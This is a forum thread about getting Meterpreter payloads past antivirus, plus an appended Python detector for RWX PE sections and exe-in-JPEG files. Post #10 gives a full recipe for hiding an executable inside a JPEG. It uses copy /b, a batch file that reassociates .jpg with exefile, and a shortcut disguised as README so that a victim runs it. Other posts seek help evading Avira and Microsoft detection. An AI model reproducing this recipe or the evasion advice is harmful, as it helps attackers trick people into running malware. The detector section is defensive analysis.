Thread: [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

  1. #1
    zimmaro (Good friend of the forums; Join Date: Mar 2010; Location: milano; Posts: 407)

    Hi guys,
    Premise: the net being a "free" thing, I came across a "compelling" read (thanks):
    http://www.pentestgeek.com/2012/01/2...t-writing-asm/
    (I recommend visiting the address before watching my video.)
    I wanted to test the "content" on MY bt5r1 by making a "video".
    Merit & credit do NOT go to me!! ... but to them!

    If you want to watch: http://vimeo.com/37071571

    PS: as always, sorry for the quality && errors!

  2. #2
    Just burned his ISO (Join Date: Jan 2012; Posts: 8)

    Great work, but do you know why it is needed to write
        .section '.text' rwx
        .entrypoint
    at the beginning of the asm file? I just don't get what that does.

  3. #3
    LHYX1 (Senior Member; Join Date: Sep 2010; Location: Belgium; Posts: 127)

    It makes the .text segment of your file executable.

  4. #4
    zimmaro (Good friend of the forums; Join Date: Mar 2010; Location: milano; Posts: 407)

    Hi,
    I declare myself super-INexperienced, but reading around it seems to me that it should: ### allow the "code-area section" to be executable ###
    ... take it with a grain of salt.
    Bye

  5. #5
    Just burned his ISO (Join Date: Nov 2009; Posts: 3)

    Hi Zimmaro,

    Many thanks for your interesting post. I just tried it, but it is still detected (I have Avira AV); any advice?

    Thank you in advance ...

  6. #6
    Just burned his ISO (Join Date: Oct 2010; Posts: 2)

    Hello, when I dial out, the AV reports Meterpreter as microsoft -> win32/swort.a.
    Does anyone know how to get it past?

  8. #8
    zimmaro (Good friend of the forums; Join Date: Mar 2010; Location: milano; Posts: 407)

    Hi ozoubi,
    I am "totally unprepared" to give you a definite answer; surely there will be a way ... working on "different types of encoding". Try doing a specific search, and run tests! (I tried with the 2 most used in my circle of "friends".) (I DO NOT USE virus-scan sites.)
    Try to "talk with the guys from the posted link", & also in this forum there are people who are very, very helpful and prepared! (except me)

  9. #9
    Just burned his ISO (Join Date: Nov 2009; Posts: 3)

    Please, just one more question:
    any idea how to merge the exe file with any other file format (pdf, jpg, avi, ...)?

    Thank you in advance.

  10. #10
    zimmaro (Good friend of the forums; Join Date: Mar 2010; Location: milano; Posts: 407)

    Hi,
    there should be several ways; they are found on the net: the various "binder" software, or the "winrar method".
    Also SET, if I remember correctly, has some similar things that exploit some vulns.
    I tried this!! It worked on CMD.exe (Windows) OR on Linux under Wine (copy the cmd.exe file, "WinXP version", into Linux):
    you need:
    1) a.exe
    2) a.jpg
    3) create a folder "photo" on the desktop
    4) cut & paste the 2 files into the folder
    5) open cmd.exe (Windows) & go to the dir of the "photo" folder
    6) write " copy /b a.exe + a.jpg a1.jpg "
    7) open the test folder to see 3 files (a.exe, a.jpg, a1.jpg)
    8) delete a.exe & a.jpg
    9) open a new notepad & write:
        @echo off
        assoc .jpg=exefile
        start a1.jpg
        assoc .jpg=jpgfile
    10) save as HELLO.bat in the photo folder
    11) create a shortcut to HELLO.bat
    12) change the icon of the shortcut (you need a "txt icon"): right-click > Properties > Shortcut > Change Icon ... OK
    13) rename the (shortcut) HELLO.bat to README (use imagination with "social engineering")
    14) zip the folder > photo.zip
    When the victim opens the compressed folder (there is no .exe) and *runs* README, the a1.jpg process starts ...
    Bye
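Two things in this thread are easy to check statically on the defender's side: the `.section '.text' rwx` template from posts #2-#4, which leaves a PE section marked both writable and executable (a flag combination normal compilers never emit), and the `copy /b a.exe + a.jpg a1.jpg` binder from post #10, which leaves an intact MZ/PE header at the front of a file whose extension says JPEG, with the real JPEG sitting in the PE overlay. The following is an added example, not code from the original posts or from the pentestgeek article: a small PE section-table parser with three checks built on it. The `IMAGE_SCN_*` constants are the documented PE header values; the sample PE it builds is constructed in-line for the demo and is not a real, loadable executable.

```python
"""Static checks for two artifacts discussed in the thread:
   - PE sections flagged RWX (what `.section '.text' rwx` produces)
   - an EXE with a JPEG appended via `copy /b a.exe + a.jpg a1.jpg`
Added example; the sample PE below is constructed, not a real binary."""
import struct

# Documented PE section characteristic flags (IMAGE_SECTION_HEADER.Characteristics)
IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000

JPEG_SOI = b"\xff\xd8\xff"
# Expected leading bytes per extension (assumption: a small, illustrative table)
MAGICS = {".jpg": JPEG_SOI, ".jpeg": JPEG_SOI, ".png": b"\x89PNG", ".exe": b"MZ"}


def parse_sections(data):
    """Return the PE section table as a list of dicts (name, raw offset/size, flags)."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]       # NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]  # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                             # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(nsec):
        (name, _vsize, _vaddr, raw_size, raw_ptr, _reloc, _lines,
         _nreloc, _nlines, flags) = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "raw_ptr": raw_ptr, "raw_size": raw_size, "flags": flags})
    return sections


def rwx_sections(data):
    """Names of sections that are both writable and executable (a W^X violation)."""
    want = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    return [s["name"] for s in parse_sections(data) if s["flags"] & want == want]


def overlay(data):
    """Bytes appended after the last section's raw data; `copy /b` puts the JPEG here."""
    end = max((s["raw_ptr"] + s["raw_size"] for s in parse_sections(data)), default=0)
    return data[end:]


def classify(filename, data):
    """Findings for one file: extension/magic mismatch, RWX sections, overlay contents."""
    findings = []
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = MAGICS.get(ext)
    if expected and not data.startswith(expected):
        findings.append("extension_mismatch")
    if data.startswith(b"MZ"):
        try:
            if rwx_sections(data):
                findings.append("rwx_section")
            tail = overlay(data)
            if tail.startswith(JPEG_SOI):
                findings.append("jpeg_overlay")
            elif tail:
                findings.append("overlay")
        except ValueError:
            findings.append("malformed_pe")
    return findings


def build_sample_pe(rwx):
    """Constructed minimal PE32 with a single .text section (for the demo only)."""
    opt = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)          # PE32 magic, rest zeroed
    flags = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    if rwx:
        flags |= IMAGE_SCN_MEM_WRITE                             # what `rwx` in the template adds
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102)
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, flags)
    header = dos + b"PE\0\0" + coff + opt + sect
    header += b"\0" * (0x200 - len(header))                      # pad to PointerToRawData
    code = b"\xcc" * 0x200                                       # int3 filler standing in for code
    return header + code


# Constructed "a1.jpg": RWX exe followed by a fake JPEG header, as `copy /b` would produce
SAMPLE_BINDER = build_sample_pe(rwx=True) + JPEG_SOI + b"\xe0\x00\x10JFIF\x00" + b"\0" * 32

if __name__ == "__main__":
    for name, blob in [("a.exe", build_sample_pe(rwx=False)), ("a1.jpg", SAMPLE_BINDER)]:
        print(name, classify(name, blob))
```

Run against the constructed samples, `a.exe` comes back clean and `a1.jpg` reports `extension_mismatch`, `rwx_section` and `jpeg_overlay`. The same three checks applied to a directory of attachments (or to the contents of `photo.zip` from the post) catch this particular binder without any signature on the payload itself, which is why post #10's trick tends to be flagged even when the Meterpreter stub inside it is not.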
